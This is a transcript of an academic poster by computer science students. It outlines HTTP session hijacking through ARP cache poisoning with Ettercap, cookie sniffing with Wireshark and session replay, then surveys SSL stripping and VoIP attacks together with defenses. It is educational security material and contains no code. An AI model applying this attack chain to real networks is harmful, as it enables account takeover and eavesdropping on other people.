Demonstrating HTTP Session Hijacking through ARP Cache Poisoning and Man-in-the-Middle Attack and...
-
Upload
claribel-oconnor -
Category
Documents
-
view
217 -
download
0
Transcript of Demonstrating HTTP Session Hijacking through ARP Cache Poisoning and Man-in-the-Middle Attack and...
![Page 1: Demonstrating HTTP Session Hijacking through ARP Cache Poisoning and Man-in-the-Middle Attack and exploring HTTPS and VOIP session vulnerabilities Mainuddin.](https://reader038.fdocuments.us/reader038/viewer/2022102907/56649d6e5503460f94a4fc18/html5/thumbnails/1.jpg)
Demonstrating HTTP Session Hijacking through ARP Cache Poisoning and Man-in-the-Middle Attack and exploring HTTPS and
VOIP session vulnerabilitiesMainuddin Ahmad Jonas and Risul Islam
Email: [email protected] and [email protected]
Department of Computer Science and Engineering (CSE), BUET
What is Session Hijacking?
A session is a lasting connection between a user (a browser) and a server involving the exchange of many requests
Session ID is a unique identifier used by the client to gain access to session data stored on the server
Session Hijacking is the exploitation of a valid computer session where an attacker takes over a session between two computers.
It is done by stealing the Session ID.
How an HTTP session can be Hijacked Any unencrypted HTTP session can be hijacked by launching a Man-
in-the-Middle attack Three steps involved:
Poisoning the ARP cache Sniffing the Session ID Hijacking the Session using the stolen Session ID
Poisoning the ARP Cache Ettercap is used to poison
the ARP Cache Client IP Address
192.168.1.102, the default gateway 192.168.1.1 and the attacker machine 192.168.1.103
After the attack, all traffic between client and default gateway passes through the attacker’s machine
Fig. 1: Poisoning the ARP cache using Ettercap
Sniffing the Session ID After establishing the MITM
attack, the Session ID can be stolen using any packet sniffer.
In Fig . 2, we have shown the use of Wireshark filters to capture the relevant HTTP traffic from our victim machine
In Fig. 3, the captured traffic is inspected to find out the secret Session ID of the current session.
Fig. 2: Using Wireshark filters to capture HTTP cookies sent from our victim machine
Fig. 3: Inspecting the Session ID from the captured packets. Here we can see the Session ID is 17F0B4417EB65A8066A3ECF241588283.tomcat3
Hijacking the Session with the stolen Session ID Using the stolen Session ID,
it is easy to gain access to a valid logged in session.
Figure shows, a Firefox add-on (Cookies Manager+) is used to hijack the session
We are building an automated tool to carry out all 3 steps
Fig. 4: Using Cookies Manager+ to hijack the session . Here we insert the Session ID we sniffed in the previous step
HTTPS Protocol and its Vulnerabilities Due to the inherent vulnerabilities of HTTP protocol demonstrated,
HTTPS connection is recommended However, even HTTPS is not secure from all MITM attacks Vulnerability in SSL Handshaking and oversight by end users can be
exploited SSL handshaking protocol is done over plaintext – allowing spoofing
of certificates through MITM attacks. Attacks of these kinds are known as SSL Sniffing attacks.
In SSL Stripping, the man-in-the-middle-attacker strips off the SSL protocol from the server’s response, and sends the client a normal HTTP response, while at the same time maintaining an SSL connection with the server.
HProxy, HSTS, SSLock, HTTPSLock, ISAN Enforcer are proposed solutions to SSL Stripping
We are currently in the process of developing a better method of preventing SSL Stripping attacks.
VoIP(Voice over Internet protocol) • A protocol which is now
widely used in the telephony system.
• Number of Residential VoIP subscribers in US is 44 million (IDC report 2010)
• Most people consider VoIP safe but increasingly it is becoming more vulnerable.
• The figure shows the communication process.
Fig. 5. Communication in VoIP
Attacks on VoIP and Prevention• Man In The Middle(MITM) attack
– A Remote Attacker (RA) acts as SIP Proxy Server(PS) to a SIP Phone and vice versa
• DOS attackDOS is nothing but making the service of VoIP stop or hamper. 2 types:
• SIP Parser attack occurs in malforming INVITE message
• Flooding attack means overflowing the PS with INVITE message
• SQL injection is injecting SQL statement in INVITE message header
Prevention of VoIP attacks:
Serial No
Attack Name Defense Mechanism Properties Further attacks
1 MITM
Using dynamic ID value and a wide ranged port number in DNS query .
No brut force search by RA. Possible by Brut
force search and sniffing
Burdensome, takes time.
2
ASIP
Parser(DOS)Message header checking strongly .
No harmful header
Not possible .No multiple connection
B Flooding (DOS)
Allowing the PS a max number of hit per second from a SIP Phone
Flooded limited from single phone
Still possible by DDOS .
Poor service
3 SQL Injection
Message header checking strongly
No harmful header
Still possible but limited .
Computationally burden